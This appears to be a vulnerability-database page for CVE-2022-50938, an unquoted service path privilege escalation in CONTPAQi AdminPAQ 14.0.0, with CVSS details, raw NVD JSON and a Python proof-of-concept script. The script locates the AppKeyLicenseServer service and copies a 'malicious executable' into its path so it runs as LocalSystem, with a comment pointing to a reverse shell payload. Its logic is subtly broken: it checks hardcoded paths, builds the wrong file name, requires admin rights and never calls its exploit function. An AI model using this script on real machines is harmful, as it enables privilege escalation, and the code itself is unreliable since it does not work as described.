Security Vulnerability Report
中文
CVE-2022-50938 CVSS 8.4 HIGH

CVE-2022-50938

Published: 2026-01-13 23:15:59
Last Modified: 2026-04-15 00:35:42
Source: [email protected]

Description

CONTPAQi AdminPAQ 14.0.0 contains an unquoted service path vulnerability in the AppKeyLicenseServer service running with LocalSystem privileges. Attackers can exploit the unquoted path to inject malicious code in the service binary path, potentially executing arbitrary code with elevated system privileges during service startup.

CVSS Details

CVSS Score
8.4
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

No configuration data available.

CONTPAQi AdminPAQ 14.0.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2022-50938 PoC - Unquoted Service Path Exploitation # Target: CONTPAQi AdminPAQ AppKeyLicenseServer Service # Severity: High (CVSS 8.4) import os import shutil import sys import ctypes def check_vulnerability(): """Check if the target service has unquoted service path""" service_name = "AppKeyLicenseServer" vulnerable_paths = [ r"C:\Program Files\CONTPAQi\AdminPAQ\AppKeyLicenseServer.exe", r"C:\Program Files (x86)\CONTPAQi\AdminPAQ\AppKeyLicenseServer.exe" ] print(f"[*] Checking service: {service_name}") # Check if service exists import subprocess try: result = subprocess.run( ['sc', 'qc', service_name], capture_output=True, text=True ) if result.returncode == 0: print(f"[+] Service {service_name} found") print(result.stdout) # Check for unquoted paths for path in vulnerable_paths: if not path.startswith('"') and ' ' in path: print(f"[!] Unquoted path detected: {path}") return path except Exception as e: print(f"[-] Error checking service: {e}") return None def exploit_unquoted_path(malicious_exe_path, target_dir): """ Exploit unquoted service path by placing malicious executable in the directory before the actual service binary """ if not os.path.exists(target_dir): print(f"[-] Target directory does not exist: {target_dir}") return False # Get the second-to-last path component path_parts = target_dir.rstrip('\\').split('\\') malicious_filename = path_parts[-2] + ".exe" malicious_target = os.path.join(target_dir, malicious_filename) print(f"[*] Placing malicious executable: {malicious_target}") try: # Backup original if exists if os.path.exists(malicious_target): shutil.copy2(malicious_target, malicious_target + ".bak") # Copy malicious executable shutil.copy2(malicious_exe_path, malicious_target) print(f"[+] Malicious executable placed successfully") print(f"[!] When AppKeyLicenseServer service restarts, {malicious_filename} will be executed") return True except Exception as e: print(f"[-] Failed to place malicious executable: {e}") return False def main(): print("=" * 60) print("CVE-2022-50938 - CONTPAQi AdminPAQ Unquoted Service Path") print("=" * 60) # Check if running with admin privileges if not ctypes.windll.shell32.IsUserAnAdmin(): print("[-] This exploit requires administrator privileges") return print("[+] Running with administrator privileges") # Check for vulnerability vulnerable_path = check_vulnerability() if vulnerable_path: print("[+] Vulnerability confirmed!") target_dir = os.path.dirname(vulnerable_path) # Example: Create a simple reverse shell payload # In real attack, this would be a proper malicious executable print("[*] To exploit, place malicious executable in:") path_parts = vulnerable_path.rstrip('\\').split('\\') malicious_name = path_parts[-2] + ".exe" print(f" {os.path.dirname(vulnerable_path)}\\\{malicious_name}") else: print("[-] Service not found or not vulnerable") if __name__ == "__main__": main()

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2022-50938", "sourceIdentifier": "[email protected]", "published": "2026-01-13T23:15:59.057", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "CONTPAQi AdminPAQ 14.0.0 contains an unquoted service path vulnerability in the AppKeyLicenseServer service running with LocalSystem privileges. Attackers can exploit the unquoted path to inject malicious code in the service binary path, potentially executing arbitrary code with elevated system privileges during service startup."}, {"lang": "es", "value": "CONTPAQi AdminPAQ 14.0.0 contiene una vulnerabilidad de ruta de servicio sin comillas en el servicio AppKeyLicenseServer que se ejecuta con privilegios de LocalSystem. Los atacantes pueden explotar la ruta sin comillas para inyectar código malicioso en la ruta binaria del servicio, lo que podría ejecutar código arbitrario con privilegios de sistema elevados durante el inicio del servicio."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:L/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 8.5, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 8.4, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.5, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-428"}]}], "references": [{"url": "https://www.contpaqi.com/descargas", "source": "[email protected]"}, {"url": "https://www.exploit-db.com/exploits/50690", "source": "[email protected]"}, {"url": "https://www.vulncheck.com/advisories/contpaqi-adminpaq-unquoted-service-path", "source": "[email protected]"}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.